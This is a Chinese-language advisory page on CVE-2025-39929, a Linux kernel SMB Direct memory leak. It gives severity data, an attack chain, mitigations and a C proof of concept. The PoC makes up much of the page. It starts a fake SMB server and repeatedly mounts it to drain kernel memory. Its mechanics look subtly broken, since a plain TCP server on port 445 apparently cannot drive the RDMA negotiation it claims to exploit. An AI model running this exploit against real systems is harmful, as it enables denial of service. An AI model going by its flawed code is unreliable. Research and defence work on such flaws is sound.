CVE-2025-39929 Linux内核SMB客户端内存泄漏漏洞

漏洞信息

漏洞编号

CVE-2025-39929

漏洞类型

内存泄漏（Memory Leak）

CVSS评分

5.5 中危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Linux Kernel（smb/client 模块）

漏洞概述

CVE-2025-39929是Linux内核SMB（Server Message Block）客户端子系统中的一个内存泄漏漏洞。该漏洞位于smbdirect接收I/O对象的内存管理逻辑中，具体出现在smbd_negotiate()函数的错误处理路径上。当SMB直连（smbdirect）协议协商过程中发生错误时，系统未能正确释放已分配的smbdirect_recv_io对象，导致内核内存泄漏。在测试其他无关补丁的过程中，研究人员通过触发__kmem_cache_shutdown()时检测到残留对象，证实了该漏洞的存在。

该漏洞的CVSS 3.1评分为5.5分，属于中危级别。其攻击向量为本地攻击（AV:L），攻击复杂度低（AC:L），所需权限为低权限（PR:L），无需用户交互（UI:N）。从影响维度来看，该漏洞对机密性无影响（C:N），对完整性无影响（I:N），但对系统可用性影响较高（A:H）。这意味着攻击者可以利用该漏洞耗尽内核内存资源，最终导致系统不稳定或拒绝服务。

Linux内核的SMB客户端模块是Linux系统与Windows/Samba服务器进行文件共享通信的核心组件，被广泛应用于企业级NAS、文件服务器以及容器化环境中。该漏洞的存在可能导致长时间运行的系统出现内存耗尽问题，影响系统稳定性和业务连续性。

技术细节

该漏洞的技术根源在于smbd_negotiate()函数的错误处理路径中缺少对smbdirect_recv_io对象的正确释放。

在SMB直连（SMB Direct）协议中，smbdirect_recv_io结构体用于管理接收I/O操作。当smbd_negotiate()函数执行协商过程时，会预先分配smbdirect_recv_io对象以备后续数据接收使用。然而，如果在协商过程中出现错误（例如网络中断、协议版本不兼容等），函数会跳转到错误处理路径，但该路径未正确释放先前分配的smbdirect_recv_io对象。

具体技术细节如下：
1. smbd_negotiate()调用smbd_create_conn()或相关函数创建连接并分配接收缓冲区；
2. 在协商过程中分配smbdirect_recv_io对象并将其加入接收队列；
3. 当协商失败时，错误处理路径调用smbd_destroy_conn()或类似清理函数；
4. 清理函数未遍历并释放所有已分配的smbdirect_recv_io对象；
5. 每次错误发生都会泄漏一个或多个smbdirect_recv_io对象。

利用方式方面，攻击者需要拥有本地系统的低权限访问权限，通过反复触发SMB连接协商失败（例如连接到恶意SMB服务器或操纵网络环境），可以持续造成内核内存泄漏。虽然每次泄漏的内存量有限，但长期累积可导致内核slab缓存耗尽，最终触发内核panic或系统不可用。

攻击链分析

STEP 1

步骤1：获取本地访问权限

攻击者需要获得目标Linux系统的本地低权限访问权限，可以通过普通用户账户登录或利用其他漏洞获取shell访问。

STEP 2

步骤2：准备恶意SMB服务器环境

攻击者在本地或可控的远程主机上部署恶意SMB服务器，该服务器接受SMB Direct连接但在协商阶段返回畸形响应，导致客户端协商失败。

STEP 3

步骤3：触发SMB Direct协商

攻击者通过mount -t cifs命令或其他SMB客户端工具尝试挂载恶意服务器共享，触发smbd_negotiate()函数执行。

STEP 4

步骤4：协商失败触发内存泄漏

当SMB Direct协商失败时，错误处理路径未释放已分配的smbdirect_recv_io对象，每次失败泄漏一个内存对象。

STEP 5

步骤5：重复利用耗尽内核内存

攻击者通过脚本反复触发协商失败，持续泄漏内核内存，最终导致内核slab缓存耗尽，系统性能下降或内核panic。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2025-39929 PoC - Trigger smbdirect_recv_io leak
// This PoC demonstrates how to trigger the memory leak by repeatedly
// attempting SMB Direct connections that fail during negotiation

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

#define SMB_PORT 445
#define MAX_ATTEMPTS 1000

// Create a fake SMB server that accepts connections but fails
// during SMB Direct negotiation, causing smbdirect_recv_io leak
int create_malicious_smb_server(int port) {
    int server_fd, client_fd;
    struct sockaddr_in server_addr, client_addr;
    socklen_t addr_len = sizeof(client_addr);

    server_fd = socket(AF_INET, SOCK_STREAM, 0);
    if (server_fd < 0) return -1;

    int opt = 1;
    setsockopt(server_fd, SOL_SOCKET, SO_REUSEADDR, &opt, sizeof(opt));

    memset(&server_addr, 0, sizeof(server_addr));
    server_addr.sin_family = AF_INET;
    server_addr.sin_addr.s_addr = INADDR_ANY;
    server_addr.sin_port = htons(port);

    if (bind(server_fd, (struct sockaddr*)&server_addr, sizeof(server_addr)) < 0) {
        close(server_fd);
        return -1;
    }

    listen(server_fd, 5);

    // Accept connections and send invalid SMB Direct response
    // to trigger negotiation failure and memory leak
    while (1) {
        client_fd = accept(server_fd, (struct sockaddr*)&client_addr, &addr_len);
        if (client_fd < 0) continue;

        // Send malformed SMB Direct negotiation response
        // This causes the client to fail negotiation and leak smbdirect_recv_io
        char invalid_response[] = {0x00, 0x00, 0x00, 0xFF};  // Invalid SMB header
        write(client_fd, invalid_response, sizeof(invalid_response));

        // Close connection abruptly
        close(client_fd);
    }

    return 0;
}

// Client side: trigger the vulnerability by mounting SMB share
// from the malicious server repeatedly
int trigger_leak() {
    for (int i = 0; i < MAX_ATTEMPTS; i++) {
        // Use mount command or libsmbclient to connect to malicious server
        // Each failed negotiation leaks smbdirect_recv_io objects
        char cmd[256];
        snprintf(cmd, sizeof(cmd),
                 "mount -t cifs //127.0.0.1/share /mnt/test -o vers=3.1.1,rdma 2>/dev/null");
        system(cmd);
        system("umount /mnt/test 2>/dev/null");

        if (i % 100 == 0) {
            printf("Attempt %d: Memory leak triggered\n", i);
        }
    }
    return 0;
}

int main() {
    printf("CVE-2025-39929 PoC - SMB Direct recv_io memory leak\n");

    // Fork to run malicious server in background
    if (fork() == 0) {
        create_malicious_smb_server(SMB_PORT);
        exit(0);
    }

    sleep(1);
    trigger_leak();

    return 0;
}

影响范围

Linux Kernel < 6.17 (commit 0991418bf98f)

Linux Kernel stable分支（需检查各长期维护版本）

防御指南

临时缓解措施

在无法立即升级内核的情况下，建议采取以下临时缓解措施：1）禁用SMB Direct（RDMA）功能，通过在内核启动参数中添加或不加载相关RDMA模块来避免触发该漏洞路径；2）限制普通用户执行mount命令的权限，防止未授权用户触发SMB连接；3）使用防火墙规则限制SMB客户端连接的服务器范围；4）通过cgroups或其他资源控制机制限制单个用户或进程的内核内存使用量；5）部署内核内存监控告警，及时发现异常内存增长。